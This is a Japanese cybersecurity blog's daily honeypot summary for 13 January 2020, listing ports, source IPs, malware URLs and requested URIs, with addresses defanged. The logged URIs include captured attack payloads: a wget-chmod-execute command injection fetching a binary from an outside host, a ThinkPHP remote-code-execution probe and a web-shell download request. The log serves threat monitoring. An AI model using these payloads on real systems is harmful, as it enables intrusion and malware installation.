sec-chick Blog

サイバーセキュリティブログ

【ハニーポット簡易分析】Honeypot簡易分析(2020/1/13)

Honeypot簡易分析(2020/1/13)の簡易分析となります。

本日は特に変わった通信はありませんでした。

<Honeytrap>

Local Port Top 10
ペイロードに文字列が含まれているものを集計

1433 263923 件

445 543 件

8080 148 件

5555 143 件

3389 76 件

81 53 件

139 45 件

52869 44 件

 

Remote IP Top 10

137[.]164[.]227[.]209 29895 件

178[.]48[.]176[.]95 29872 件

171[.]250[.]245[.]42 23348 件

185[.]91[.]116[.]223 22645 件

117[.]1[.]206[.]233 21589 件

177[.]0[.]234[.]79 19046 件

36[.]90[.]15[.]231 16649 件

83[.]2[.]188[.]80 14035 件

 

Malware

No Malware 266819 件

hxxp://51[.]77[.]213[.]109/mips 7 件

hxxp://switchnets[.]net/unstable 1 件

hxxp://91[.]92[.]66[.]124/ 1 件

hxxp://165[.]227[.]78[.]159/wl[.]php 1 件

hxxp://185[.]181[.]10[.]234/E5DB0E07C3D7BE80V520/init[.]sh 1 件

hxxp://139[.]99[.]28[.]174/m-i[.]p-s[.]SNOOPY 1 件

hxxp://205[.]185[.]115[.]72/d 1 件

<WOWHoneypot>

URI Path Top 10

/ 27 件

/admin/assets/js/views/login[.]js 14 件

/admin/i18n/readme[.]txt 6 件

/recordings/theme/main[.]css 6 件

/admin/config[.]php 6 件

/a2billing/customer/templates/default/css/menu[.]css 3 件

/TP/public/index[.]php 2 件

/FxCodeShell[.]jsp  1 件

 

Remote IP Top 10

RemoteIP Count

77[.]247[.]108[.]77 27 件

77[.]247[.]108[.]119 8 件

129[.]213[.]81[.]87 4 件

220[.]162[.]247[.]161 2 件

94[.]230[.]114[.]51 1 件

74[.]63[.]227[.]26 1 件

114[.]156[.]3[.]170 1 件

60[.]191[.]66[.]222 1 件

All URI

URI Count

/ 26 件

/admin/assets/js/views/login[.]js 14 件

/admin/i18n/readme[.]txt 6 件

/recordings/theme/main[.]css 6 件

/admin/config[.]php 6 件

/a2billing/customer/templates/default/css/menu[.]css 3 件

/FxCodeShell[.]jsp  1 件

/FxCodeShell[.]jsp::$DATA 1 件

/FxCodeShell[.]jsp/ 1 件

/FxCodeShell[.]jsp?view=FxxkMyLie1836710Aa&os=1&address=hxxp://fk[.]openyourass[.]icu/download[.]exe 1 件

/robots[.]txt 1 件

/manager/html 1 件

hxxp://123[.]125[.]114[.]144/ 1 件

cn[.]bing[.]com:443 1 件

www[.]baidu[.]com:443 1 件

hxxp://www[.]123cha[.]com/ 1 件

www[.]ipip[.]net:443 1 件

/phpmyadmin/ 1 件

/card_scan_decoder[.]php?No=30&door=`wget hxxp://switchnets[.]net/hoho[.]arm7; chmod 777 hoho[.]arm7; [.]/hoho[.]arm7 linear` 1 件

/?XDEBUG_SESSION_START=phpstorm 1 件

/TP/public/index[.]php 1 件

/TP/public/index[.]php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 1 件

ip[.]ws[.]126[.]net:443 1 件

 

<WOWHoneypot(https)>

URI Path Top 10

URI Path Count

/admin/assets/js/views/login[.]js 13 件

/ 7 件

/admin/i18n/readme[.]txt 5 件

/recordings/theme/main[.]css 5 件

/admin/config[.]php 5 件

/a2billing/customer/templates/default/css/menu[.]css 3 件

/sdk 1 件

/lookingfor4041578893886 1 件

 

Remote IP Top 10

RemoteIP Count

77[.]247[.]108[.]77 23 件

77[.]247[.]108[.]119 8 件

80[.]85[.]86[.]175 8 件

184[.]105[.]247[.]195 1 件

185[.]176[.]27[.]114 1 件

128[.]14[.]133[.]58 1 件

124[.]156[.]50[.]148 1 件

 

 

All URI

URI Count

/admin/assets/js/views/login[.]js 13 件

/ 7 件

/admin/i18n/readme[.]txt 5 件

/recordings/theme/main[.]css 5 件

/admin/config[.]php 5 件

/a2billing/customer/templates/default/css/menu[.]css 3 件

/sdk 1 件

/lookingfor4041578893886 1 件

/404pagefinder1578893886 1 件

/hopefullya404page1578893886 1 件

/HNAP1 1 件

以上となります。